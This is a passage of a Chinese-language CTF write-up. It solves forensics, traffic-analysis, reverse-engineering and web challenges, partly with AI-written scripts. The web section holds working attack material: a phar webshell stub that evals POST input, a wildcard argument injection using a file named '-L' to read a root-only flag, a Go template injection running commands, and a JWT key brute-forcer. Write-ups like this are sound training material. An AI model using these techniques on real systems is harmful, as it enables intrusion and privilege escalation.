    if [[ "$domain" == *.cn ]]; then
        raw_output=$(whois -h whois.cnnic.cn "$domain")
    else
        raw_output=$(whois "$domain")
    fi


    # 使用 grep 和正则表达式来筛选包含特定关键词的行
    # -i: 忽略大小写
    # -E: 使用扩展正则表达式,可以用 | 来表示“或”
    # ^\s*: 匹配行首的任意空格,确保我们匹配的是字段名而不是描述文本
    # (Creation|Registration|Updated|Modified|Expiry|Expiration|Sponsoring|Commencement): 匹配各种关键词
    # .*: 匹配该行的剩余部分
    filtered_info=$(echo "$raw_output" | grep -iE '^\s*(Creation Date|Registration Time|Registered on|Updated Date|Last Modified|Last update of whois database)\s*:')


    # 检查是否找到了信息
    if [ -n "$filtered_info" ]; then
        echo "$filtered_info"
    else
        echo "未能找到标准格式的注册或更新时间信息。"
        echo "可能是域名无效,或其WHOIS信息格式特殊。"
    fi


    echo -e "========================================\n"
    # 暂停1秒,避免查询过于频繁
    sleep 1
done


echo "所有域名查询完毕。"

经过人工筛选后,找到部分域名

tombaky.com # 法国IP?应该是这个???说系统时区了
5hte21mz.com # 极其可疑(但是备案了
tdnsstic1.cn
cdnhwcbzj102.com
jomodns.com
hzyidc.com
outin.cn
adxvip.com
ipv4only.arpa    # 假的

认为是 tombaky.com

在搜索的过程中发现,挖矿软件特征与 kinsing 很像,交上去发现对了

所以得到答案

192.168.145.131
258
/usr/sbin/sshd
tombaky.com
kinsing

checkwebshell#

流量开头发送了 GET /shell.php,应该是检查存活

执行命令的方式:POST /shell.php,格式为 Form,“shell” = “command”,在 Packet 696 出现了 system("type flag.txt"); 可以认为是 Windows 服务器,得到了下面的代码

<?php
class SM4 {
    const ENCRYPT = 1;
    private $sk;
    private static $FK = [0xA3B1BAC6, 0x56AA3350, 0x677D9197, 0xB27022DC];
    private static $CK = [
        0x00070E15, 0x1C232A31, 0x383F464D, 0x545B6269,
        0x70777E85, 0x8C939AA1, 0xA8AFB6BD, 0xC4CBD2D9,
        0xE0E7EEF5, 0xFC030A11, 0x181F262D, 0x343B4249,
        0x50575E65, 0x6C737A81, 0x888F969D, 0xA4ABB2B9,
        0xC0C7CED5, 0xDCE3EAF1, 0xF8FF060D, 0x141B2229,
        0x30373E45, 0x4C535A61, 0x686F767D, 0x848B9299,
        0xA0A7AEB5, 0xBCC3CAD1, 0xD8DFE6ED, 0xF4FB0209,
        0x10171E25, 0x2C333A41, 0x484F565D, 0x646B7279
    ];
    private static $SboxTable = [
        0xD6, 0x90, 0xE9, 0xFE, 0xCC, 0xE1, 0x3D, 0xB7, 0x16, 0xB6, 0x14, 0xC2, 0x28, 0xFB, 0x2C, 0x05,
        0x2B, 0x67, 0x9A, 0x76, 0x2A, 0xBE, 0x04, 0xC3, 0xAA, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,
        0x9C, 0x42, 0x50, 0xF4, 0x91, 0xEF, 0x98, 0x7A, 0x33, 0x54, 0x0B, 0x43, 0xED, 0xCF, 0xAC, 0x62,
        0xE4, 0xB3, 0x1C, 0xA9, 0xC9, 0x08, 0xE8, 0x95, 0x80, 0xDF, 0x94, 0xFA, 0x75, 0x8F, 0x3F, 0xA6,
        0x47, 0x07, 0xA7, 0xFC, 0xF3, 0x73, 0x17, 0xBA, 0x83, 0x59, 0x3C, 0x19, 0xE6, 0x85, 0x4F, 0xA8,
        0x68, 0x6B, 0x81, 0xB2, 0x71, 0x64, 0xDA, 0x8B, 0xF8, 0xEB, 0x0F, 0x4B, 0x70, 0x56, 0x9D, 0x35,
        0x1E, 0x24, 0x0E, 0x5E, 0x63, 0x58, 0xD1, 0xA2, 0x25, 0x22, 0x7C, 0x3B, 0x01, 0x0D, 0x2D, 0xEC,
        0x84, 0x9B, 0x1E, 0x87, 0xE0, 0x3E, 0xB5, 0x66, 0x48, 0x02, 0x6C, 0xBB, 0xBB, 0x32, 0x83, 0x27,
        0x9E, 0x01, 0x8D, 0x53, 0x9B, 0x64, 0x7B, 0x6B, 0x6A, 0x6C, 0xEC, 0xBB, 0xC4, 0x94, 0x3B, 0x0C,
        0x76, 0xD2, 0x09, 0xAA, 0x16, 0x15, 0x3D, 0x2D, 0x0A, 0xFD, 0xE4, 0xB7, 0x37, 0x63, 0x28, 0xDD,
        0x7C, 0xEA, 0x97, 0x8C, 0x6D, 0xC7, 0xF2, 0x3E, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7,
        0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x36, 0x24, 0x07, 0x82, 0xFA, 0x54, 0x5B, 0x40,
        0x8F, 0xED, 0x1F, 0xDA, 0x93, 0x80, 0xF9, 0x61, 0x1C, 0x70, 0xC3, 0x85, 0x95, 0xA9, 0x79, 0x08,
        0x46, 0x29, 0x02, 0x3B, 0x4D, 0x83, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x1A, 0x47, 0x5C, 0x0D, 0xEA,
        0x9E, 0xCB, 0x55, 0x20, 0x15, 0x8A, 0x9A, 0xCB, 0x43, 0x0C, 0xF0, 0x0B, 0x40, 0x58, 0x00, 0x8F,
        0xEB, 0xBE, 0x3D, 0xC2, 0x9F, 0x51, 0xFA, 0x13, 0x3B, 0x0D, 0x90, 0x5B, 0x6E, 0x45, 0x59, 0x33
    ];


    public function __construct($key) {
        $this->setKey($key);
    }
    public function setKey($key) {
        if (strlen($key) != 16) {
            throw new Exception("SM4");
        }
        $key = $this->strToIntArray($key);
        $k = array_merge($key, [0, 0, 0, 0]);
        for ($i = 0; $i < 4; $i++) {
            $k[$i] ^= self::$FK[$i];
        }
        for ($i = 0; $i < 32; $i++) {
            $k[$i + 4] = $k[$i] ^ $this->CKF($k[$i + 1], $k[$i + 2], $k[$i + 3], self::$CK[$i]);
            $this->sk[$i] = $k[$i + 4];
        }
    }
    public function encrypt($plaintext) {
        $len = strlen($plaintext);
        $padding = 16 - ($len % 16);
        $plaintext .= str_repeat(chr($padding), $padding);
        $ciphertext = '';
        for ($i = 0; $i < strlen($plaintext); $i += 16) {
            $block = substr($plaintext, $i, 16);
            $ciphertext .= $this->cryptBlock($block, self::ENCRYPT);
        }
        return $ciphertext;
    }
    private function cryptBlock($block, $mode) {
        $x = $this->strToIntArray($block);


        for ($i = 0; $i < 32; $i++) {
            $roundKey = $this->sk[$i];
            $x[4] = $x[0] ^ $this->F($x[1], $x[2], $x[3], $roundKey);
            array_shift($x);
        }
        $x = array_reverse($x);
        return $this->intArrayToStr($x);
    }
    private function F($x1, $x2, $x3, $rk) {
        return $this->T($x1 ^ $x2 ^ $x3 ^ $rk);
    }
    private function CKF($a, $b, $c, $ck) {
        return $a ^ $this->T($b ^ $c ^ $ck);
    }
    private function T($x) {
        return $this->L($this->S($x));
    }
    private function S($x) {
        $result = 0;
        for ($i = 0; $i < 4; $i++) {
            $byte = ($x >> (24 - $i * 8)) & 0xFF;
            $result |= self::$SboxTable[$byte] << (24 - $i * 8);
        }
        return $result;
    }
    private function L($x) {
        return $x ^ $this->rotl($x, 2) ^ $this->rotl($x, 10) ^ $this->rotl($x, 18) ^ $this->rotl($x, 24);
    }
    private function rotl($x, $n) {
        return (($x << $n) & 0xFFFFFFFF) | (($x >> (32 - $n)) & 0xFFFFFFFF);
    }
    private function strToIntArray($str) {
        $result = [];
        for ($i = 0; $i < 4; $i++) {
            $offset = $i * 4;
            $result[$i] =
                (ord($str[$offset]) << 24) |
                (ord($str[$offset + 1]) << 16) |
                (ord($str[$offset + 2]) << 8) |
                ord($str[$offset + 3]);
        }
        return $result;
    }
    private function intArrayToStr($array) {
        $str = '';
        foreach ($array as $int) {
            $str .= chr(($int >> 24) & 0xFF);
            $str .= chr(($int >> 16) & 0xFF);
            $str .= chr(($int >> 8) & 0xFF);
            $str .= chr($int & 0xFF);
        }
        return $str;
    }
}
try {
    $key = "a8a58b78f41eeb6a";
    $sm4 = new SM4($key);
    $plaintext = "flag";
    $ciphertext = $sm4->encrypt($plaintext);
    echo  base64_encode($ciphertext) ; //VCWBIdzfjm45EmYFWcqXX0VpQeZPeI6Qqyjsv31yuPTDC80lhFlaJY2R3TintdQu
} catch (Exception $e) {
    echo $e->getMessage() ;
}
?>

前面有执行 dir

shell=system("dir");
HTTP/1.1 200 OK
Date: Mon, 11 Aug 2025 08:40:24 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


 ...... C ................
 ............ C26B-E507


 C:\phpstudy_pro\WWW ......


2025/08/11  16:34    <DIR>          .
2025/08/11  16:34    <DIR>          ..
2025/06/09  23:55                 0 .htaccess
2024/07/26  09:50    <DIR>          error
2025/08/11  16:33             5,545 flag.txt
2019/09/03  14:30             2,307 index.html
2025/06/09  23:55                 0 nginx.htaccess
2025/07/25  11:24    <DIR>          pikaqiu
2025/08/11  16:12                33 shell.php
2024/07/26  15:17    <DIR>          sqli
               5 ......          7,885 ....
               5 ......  5,388,627,968 ........

剩下的 Gemini 梭了

import struct
import base64


class SM4:
    """
    根据提供的PHP代码逻辑实现的SM4解密器。
    注意:此实现复制了PHP代码中的非标准密钥扩展算法。
    """


    # SM4 算法中使用的固定参数和S盒
    FK = [0xA3B1BAC6, 0x56AA3350, 0x677D9197, 0xB27022DC]
    CK = [
        0x00070E15, 0x1C232A31, 0x383F464D, 0x545B6269,
        0x70777E85, 0x8C939AA1, 0xA8AFB6BD, 0xC4CBD2D9,
        0xE0E7EEF5, 0xFC030A11, 0x181F262D, 0x343B4249,
        0x50575E65, 0x6C737A81, 0x888F969D, 0xA4ABB2B9,
        0xC0C7CED5, 0xDCE3EAF1, 0xF8FF060D, 0x141B2229,
        0x30373E45, 0x4C535A61, 0x686F767D, 0x848B9299,
        0xA0A7AEB5, 0xBCC3CAD1, 0xD8DFE6ED, 0xF4FB0209,
        0x10171E25, 0x2C333A41, 0x484F565D, 0x646B7279
    ]
    SboxTable = [
        0xD6, 0x90, 0xE9, 0xFE, 0xCC, 0xE1, 0x3D, 0xB7, 0x16, 0xB6, 0x14, 0xC2, 0x28, 0xFB, 0x2C, 0x05,
        0x2B, 0x67, 0x9A, 0x76, 0x2A, 0xBE, 0x04, 0xC3, 0xAA, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,
        0x9C, 0x42, 0x50, 0xF4, 0x91, 0xEF, 0x98, 0x7A, 0x33, 0x54, 0x0B, 0x43, 0xED, 0xCF, 0xAC, 0x62,
        0xE4, 0xB3, 0x1C, 0xA9, 0xC9, 0x08, 0xE8, 0x95, 0x80, 0xDF, 0x94, 0xFA, 0x75, 0x8F, 0x3F, 0xA6,
        0x47, 0x07, 0xA7, 0xFC, 0xF3, 0x73, 0x17, 0xBA, 0x83, 0x59, 0x3C, 0x19, 0xE6, 0x85, 0x4F, 0xA8,
        0x68, 0x6B, 0x81, 0xB2, 0x71, 0x64, 0xDA, 0x8B, 0xF8, 0xEB, 0x0F, 0x4B, 0x70, 0x56, 0x9D, 0x35,
        0x1E, 0x24, 0x0E, 0x5E, 0x63, 0x58, 0xD1, 0xA2, 0x25, 0x22, 0x7C, 0x3B, 0x01, 0x0D, 0x2D, 0xEC,
        0x84, 0x9B, 0x1E, 0x87, 0xE0, 0x3E, 0xB5, 0x66, 0x48, 0x02, 0x6C, 0xBB, 0xBB, 0x32, 0x83, 0x27,
        0x9E, 0x01, 0x8D, 0x53, 0x9B, 0x64, 0x7B, 0x6B, 0x6A, 0x6C, 0xEC, 0xBB, 0xC4, 0x94, 0x3B, 0x0C,
        0x76, 0xD2, 0x09, 0xAA, 0x16, 0x15, 0x3D, 0x2D, 0x0A, 0xFD, 0xE4, 0xB7, 0x37, 0x63, 0x28, 0xDD,
        0x7C, 0xEA, 0x97, 0x8C, 0x6D, 0xC7, 0xF2, 0x3E, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7,
        0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x36, 0x24, 0x07, 0x82, 0xFA, 0x54, 0x5B, 0x40,
        0x8F, 0xED, 0x1F, 0xDA, 0x93, 0x80, 0xF9, 0x61, 0x1C, 0x70, 0xC3, 0x85, 0x95, 0xA9, 0x79, 0x08,
        0x46, 0x29, 0x02, 0x3B, 0x4D, 0x83, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x1A, 0x47, 0x5C, 0x0D, 0xEA,
        0x9E, 0xCB, 0x55, 0x20, 0x15, 0x8A, 0x9A, 0xCB, 0x43, 0x0C, 0xF0, 0x0B, 0x40, 0x58, 0x00, 0x8F,
        0xEB, 0xBE, 0x3D, 0xC2, 0x9F, 0x51, 0xFA, 0x13, 0x3B, 0x0D, 0x90, 0x5B, 0x6E, 0x45, 0x59, 0x33
    ]


    def __init__(self, key: bytes):
        if len(key) != 16:
            raise ValueError("Key must be 16 bytes long.")
        self.sk = [0] * 32
        self._set_key(key)


    def _rotl(self, x, n):
        """32位循环左移"""
        return ((x << n) & 0xFFFFFFFF) | ((x >> (32 - n)) & 0xFFFFFFFF)


    def _S(self, x):
        """S盒变换"""
        b1 = (x >> 24) & 0xFF
        b2 = (x >> 16) & 0xFF
        b3 = (x >> 8) & 0xFF
        b4 = x & 0xFF
        return (self.SboxTable[b1] << 24 |
                self.SboxTable[b2] << 16 |
                self.SboxTable[b3] << 8 |
                self.SboxTable[b4])


    def _L(self, x):
        """线性变换L"""
        return (x ^ self._rotl(x, 2) ^ self._rotl(x, 10) ^
                self._rotl(x, 18) ^ self._rotl(x, 24))


    def _T(self, x):
        """合成变换T"""
        return self._L(self._S(x))


    def _CKF(self, a, b, c, ck):
        """
        模拟PHP代码中非标准的密钥扩展函数CKF
        原始PHP代码: $a ^ $this->T($b ^ $c ^ $ck)
        正确的SM4标准应为: T(a ^ b ^ c ^ ck)
        """
        return a ^ self._T(b ^ c ^ ck)


    def _set_key(self, key: bytes):
        """密钥扩展算法,完全模拟PHP代码的逻辑"""
        mk = list(struct.unpack('>4I', key))
        k = [0] * 36


        for i in range(4):
            k[i] = mk[i] ^ self.FK[i]


        for i in range(32):
            # 关键:完全复现PHP代码中的密钥扩展逻辑
            # k[i+4] = k[i] ^ CKF(k[i+1], k[i+2], k[i+3], CK[i])
            k[i + 4] = k[i] ^ self._CKF(k[i + 1], k[i + 2], k[i + 3], self.CK[i])
            self.sk[i] = k[i + 4]


    def _crypt_block(self, block: bytes, is_decrypt: bool) -> bytes:
        """对单个16字节块进行加密或解密"""
        x = list(struct.unpack('>4I', block))


        # 解密时使用反向的轮密钥
        round_keys = self.sk[::-1] if is_decrypt else self.sk


        for i in range(32):
            # 轮函数 F
            f_out = self._T(x[1] ^ x[2] ^ x[3] ^ round_keys[i])
            x_next = x[0] ^ f_out


            # 状态更新
            x[0], x[1], x[2], x[3] = x[1], x[2], x[3], x_next


        # 反序变换
        x.reverse()
        return struct.pack('>4I', *x)


    def _unpad(self, data: bytes) -> bytes:
        """PKCS#7去填充"""
        pad_len = data[-1]
        if pad_len > 16 or pad_len == 0:
            return data # 无效的填充长度


        padding = data[-pad_len:]
        if any(p != pad_len for p in padding):
            return data # 填充字节不一致


        return data[:-pad_len]


    def decrypt(self, ciphertext_b64: str) -> str:
        """
        解密一个Base64编码的密文
        """
        try:
            ciphertext_bytes = base64.b64decode(ciphertext_b64)
        except (ValueError, TypeError):
            return "Error: Invalid Base64 string."


        if len(ciphertext_bytes) % 16 != 0:
            return "Error: Ciphertext length is not a multiple of 16."


        decrypted_data = b""
        for i in range(0, len(ciphertext_bytes), 16):
            block = ciphertext_bytes[i:i+16]
            decrypted_data += self._crypt_block(block, is_decrypt=True)


        # 去除填充并解码为UTF-8字符串
        unpadded_data = self._unpad(decrypted_data)
        return unpadded_data.decode('utf-8', errors='ignore')


# --- 主程序 ---
if __name__ == "__main__":
    # 从PHP代码中获取的密钥和密文
    key_str = "a8a58b78f41eeb6a"
    ciphertext_b64 = "VCWBIdzfjm45EmYFWcqXX0VpQeZPeI6Qqyjsv31yuPTDC80lhFlaJY2R3TintdQu"


    print(f"待解密的密文 (Base64): {ciphertext_b64}")
    print(f"使用的密钥: {key_str}")
    print("-" * 30)


    # 将密钥转换为bytes
    key_bytes = key_str.encode('utf-8')


    # 创建SM4解密器实例
    sm4_decoder = SM4(key_bytes)


    # 执行解密
    flag = sm4_decoder.decrypt(ciphertext_b64)


    print(f"解密得到的 Flag: {flag}")
> python .\gsolve.py
待解密的密文 (Base64): VCWBIdzfjm45EmYFWcqXX0VpQeZPeI6Qqyjsv31yuPTDC80lhFlaJY2R3TintdQu
使用的密钥: a8a58b78f41eeb6a
------------------------------
解密得到的 Flag: flag{1ac380d6-5820-4e1a-b40e-ddf1789f6b0d}

Reverse#

hardtest#

定位到 main 函数

找到几个关键加密函数

写一个解密脚本

def ROL(data, shift, size=8):
    shift %= size
    return ((data << shift) | (data >> (size - shift))) & ((1 << size) - 1)


def ROR(data, shift, size=8):
    shift %= size
    return ((data >> shift) | (data << (size - shift))) & ((1 << size) - 1)


# byte_2020 array (256 bytes)
byte_2020 = [
    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16
]


# byte_2120 array (24 bytes)
byte_2120 = [
    0x97, 0xD5, 0x60, 0x43, 0xB4, 0x10, 0x43, 0x73, 0x0F, 0xDA, 0x43, 0xCD, 0xD3, 0xE8, 0x73, 0x4A,
    0x94, 0xC3, 0xCD, 0x71, 0xBD, 0xDC, 0x97, 0x1A
]


flag_bytes = []
for i, c in enumerate(byte_2120):
    # Step 1: Find index i0 in byte_2020 where byte_2020[i0] == c
    i0 = byte_2020.index(c)


    # Step 2: v3 = ROL(i0, 2)
    v3 = ROL(i0, 2)


    # Step 3: Compute y = v3^{-1} mod 257
    if v3 == 0:
        y = 0
    else:
        y = pow(v3, 255, 257)


    # Step 4: Extract high and low nibbles from y
    a_high = (y >> 4) & 0xF
    b_low = y & 0xF


    # Step 5: Reverse linear transformation
    a_orig = (a_high * 11) % 16
    b_orig = (b_low * 13) % 16


    # Step 6: Combine into v1
    v1 = (a_orig << 4) | b_orig


    # Step 7: Compute x = ROR(v1, 3) ^ 0x5A
    x = ROR(v1, 3) ^ 0x5A


    # Step 8: Reverse pre-processing: k = (i % 7) + 1, then s_i = ROR(x, k)
    k = (i % 7) + 1
    s_i = ROR(x, k)
    flag_bytes.append(s_i)


flag = ''.join(chr(b) for b in flag_bytes)
print(flag)

strangeapp#

尝试用dexdump,redmi k50 以及 pixel6 A14都跑不起不来, 分析了一下app的so发现是自定义linker加固, 盲猜是写死了linker的偏移导致app在其他Android版本的设备运行会崩溃

题目测试环境:pixel 4a android11

使用Android Studio的模拟器配置相同环境跑起来后,用 https://github.com/hluwa/frida-dexdump 提取运行时的dex, app在启动时对 libc art等系统库有校验, 不能用spawn模式启动, 用 -n 选项attach上去dump就行了

dex脱壳,dump下来

在classes06.dex中得到逻辑

AES加密直接解即可得 flag{just_easy_strange_app_right?}

Minigame#

微信小程序,用这个脚本解压一下

https://gist.github.com/Integ/bcac5c21de5ea35b63b3db2c725f07ad

解压后 utils 文件夹内有 validator.wasm,丢进 IDA

发现 DATA 段数据

data:00FE                 db 0x26 ; &
data:00FF data_0:         db 0xFF, 0xF5, 0xF8, 0xFE, 0xE2, 0xFF, 0xF8, 0xFC, 0xA9
data:0108                 db 0xFB, 0xAB, 0xAE, 0xFA, 0xAD, 0xAC, 0xA8, 0xFA, 0xAE
data:0111                 db 0xAB, 2 dup(0xA1), 0xAF, 0xAE, 0xF8, 0xAC, 0xAF, 0xAE
data:011A                 db 0xFC, 0xA1, 0xFA, 0xA8, 2 dup(0xFB), 0xAD, 0xFC, 0xAC
data:0123                 db 0xAA, 0xE4
data:0123 ; end of 'data'
data:0123

上面发现有一个默认的 0x99 (code:00D4)

code:00BF ; ---------------------------------------------------------------------------
code:00BF
code:00BF L7:                                     ; CODE XREF: c+7E↑j
code:00BF                 loop                    ; L8
code:00C1
code:00C1 L8:                                     ; CODE XREF: c+B3↓j
code:00C1                  block                  ; L9
code:00C3                   i32.load8_u [$local1+0x400]
code:00C9                   i32.add $local1, $local2
code:00CE                   i32.load8_s
code:00D1                   i32.xor
code:00D2                   local.tee $param0
code:00D4                   i32.const 0x99
code:00D7                   i32.eq
code:00D8                   local.set $local0
code:00DA                   i32.ne  $param0, 0x99
code:00E0                   br_if   0 L9
code:00E2                   i32.add $local1, 1
code:00E7                   local.tee $local1
code:00E9                   i32.const 0x26
code:00EB                   i32.ne
code:00EC                   br_if   1 L8
code:00EE                  end                    ; L9
code:00EF
code:00EF L9:                                     ; CODE XREF: c+A5↑j
code:00EF                 end                     ; L8
code:00F0                 local.get $local0
code:00F2                 end
code:00F2 ; End of function c
code:00F2
code:00F2 ; ---------------------------------------------------------------------------

这里是拿下面的数据段中的数据与固定的 0x99 进行异或,让AI写个脚本

# 1. 从 Wasm 汇编的 data section 提取加密的字节串
# data:00FF data_0: db 0xFF, 0xF5, 0xF8, 0xFE, 0xE2, 0xFF, 0xF8, 0xFC, 0xA9
#                 db 0xFB, 0xAB, 0xAE, 0xFA, 0xAD, 0xAC, 0xA8, 0xFA, 0xAE
#                 db 0xAB, 2 dup(0xA1), 0xAF, 0xAE, 0xF8, 0xAC, 0xAF, 0xAE
#                 db 0xFC, 0xA1, 0xFA, 0xA8, 2 dup(0xFB), 0xAD, 0xFC, 0xAC
#                 db 0xAA, 0xE4
#
# 注意:开头的 0x26 是数据长度,不是加密内容的一部分。
encrypted_data = bytes([
    0xFF, 0xF5, 0xF8, 0xFE, 0xE2, 0xFF, 0xF8, 0xFC, 0xA9,
    0xFB, 0xAB, 0xAE, 0xFA, 0xAD, 0xAC, 0xA8, 0xFA, 0xAE,
    0xAB, 0xA1, 0xA1, 0xAF, 0xAE, 0xF8, 0xAC, 0xAF, 0xAE,
    0xFC, 0xA1, 0xFA, 0xA8, 0xFB, 0xFB, 0xAD, 0xFC, 0xAC,
    0xAA, 0xE4
])


# 2. 定义解密的 XOR 密钥
# 根据逆向分析,每个字节都需要与 0x99 进行异或
xor_key = 0x99


# 3. 执行解密
decrypted_bytes = bytearray()
for byte in encrypted_data:
    decrypted_bytes.append(byte ^ xor_key)


# 4. 将解密后的字节转换为字符串并打印
# 使用 .decode() 将字节数组转换为可读的字符串
try:
    flag = decrypted_bytes.decode('utf-8')
    print("🚀 解密成功!")
    print(f"Flag: {flag}")
except UnicodeDecodeError as e:
    print("❌ 解密失败或结果不是有效的UTF-8字符串。")
    print(f"原始解密字节: {decrypted_bytes}")

Web#

easy_readfile#

题目源码

<?php
highlight_file(__FILE__);


function waf($data){
    if (is_array($data)){
        die("Cannot transfer arrays");
    }
    if (preg_match('/<\?|__HALT_COMPILER|get|Coral|Nimbus|Zephyr|Acheron|ctor|payload|php|filter|base64|rot13|read|data/i', $data)) {
        die("You can't do");
    }
}


class Coral{
    public $pivot;


    public function __set($k, $value) {
        $k = $this->pivot->ctor;
        echo new $k($value);
    }
}


class Nimbus{
    public $handle;
    public $ctor;


    public function __destruct() {
        return $this->handle();
    }
    public function __call($name, $arg){
        $arg[1] = $this->handle->$name;
    }
}


class Zephyr{
    public $target;
    public $payload;
    public function __get($prop)
    {
        $this->target->$prop = $this->payload;
    }
}


class Acheron {
    public $mode;


    public function __destruct(){
        $data = $_POST[0];
        if ($this->mode == 'w') {
            waf($data);
            $filename = "/tmp/".md5(rand()).".phar";
            file_put_contents($filename, $data);
            echo $filename;
        } else if ($this->mode == 'r') {
            waf($data);
            $f = include($data);
            if($f){
                echo "It is file";
            }
            else{
                echo "You can look at the others";
            }
        }
    }
}


if(strlen($_POST[1]) < 52) {
    $a = unserialize($_POST[1]);
}
else{
    echo "str too long";
}


?>

此事在lilctf 2025亦有记载,跟lilctf的一题几乎一样,直接用gzip来绕过waf

一开始尝试半天都无法成功,原来是payload被过滤了,我原来的脚本生成的phar文件名是payload.phar

<?php
$phar = new Phar("rst.phar");
$phar->compressFiles(Phar::GZ);
$phar->startBuffering();
#$p->setStub("<?php \$ch = curl_init('file://aa.txt');curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);\$data = curl_exec(\$ch);curl_close(\$ch);echo \$data; __HALT_COMPILER();");
$phar->setStub('
<?php
eval($_POST["cmd"]);
__HALT_COMPILER();
');
$phar->addFromString("rubbish", "AAAAAAAAAAA");
$phar->stopBuffering();
?>

yakit上传文件即可

再来通过文件包含进行rce

读flag发现读不了,用户是ctfuser,而flag要root才能读,没权限。

那接下来就是尝试提权了

发现根目录有pushflag.sh,run.sh,start.sh

ps aux看了一下发现run.sh是以root权限运行的,可以尝试利用提权

b1d02b2a-722c-40b6-979d-c28c157e6479

查看run.sh内容,发现定期在备份,并且会赋予文件755的权限,可以利用这个通配符

#!/bin/bash
cd /var/www/html/
while :
    do
        cp -P * /var/www/html/backup/
        chmod 755 -R /var/www/html/backup/
        sleep 10

使用ln命令创建硬链接提权读取flag,这里不能使用-s创建软链接,创建软链接会复制软链接到backup,而不是文件内容

可以利用这个通配符*,创建一个文件名带有-L的文件来利用

使用 -L 强制解引用,后解析的参数会覆盖掉前面的 -P,构造payload

Terminal window
cd /var/www/html;echo 1>'-L';ln -s /flag /var/www/html/realflag;

出现软链接

读取flag

SSTI#

一开始发现{{ ‘a’ }}返回97 {{“abc”}}返回abc

fuzz了一下,发现waf了f,l,g字符,还有很多字符串疑似

拿ssti字典fuzz了一下

{% raw %} {{.}}发现有两个东西,是Go模板注入 {% endraw %} 

map[B64Decode:0x6ee380 exec:0x6ee120]

发现可以exec “id” ,返回了用户uid,本来用的whoami,结果发现被waf了

{% raw %} 通过{{ “xxx” }}可以来试探waf {% endraw %} AI梭一下,直接盲猜

#/cat flag {% raw %} {{B64Decode “Y2F0IC9mbGFn” | exec}} {% endraw %}

ez_python#

给了hint,爆破jwt后两位就可以

搓一个小脚本

import jwt
from jwt.exceptions import InvalidSignatureError, DecodeError
import itertools
import string


jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6InVzZXIifQ.karYCKLm5IhtINWMSZkSe1nYvrhyg5TgsrEm7VR1D0E"


# 密钥前缀
key_prefix = "@o70xO$0%#qR9#"


# 生成所有可能的两个字母数字组合
alphanumeric = string.ascii_letters + string.digits
missing_chars = itertools.product(alphanumeric, repeat=2)


# 尝试解码
for chars in missing_chars:
    key = key_prefix + ''.join(chars)
    try:
        decoded = jwt.decode(jwt_token, key, algorithms=["HS256"])
        print(f"Success! Key found: {key}")
        print(f"Decoded payload: {decoded}")
        break
    except InvalidSignatureError:
        continue
    except DecodeError:
        continue
    except Exception as e:
        continue
else:
    print("No valid key found.")

将jwt里的role改为admin就变成管理员身份了

python好像运行不了,那试试yaml的漏洞

https://xz.aliyun.com/news/38

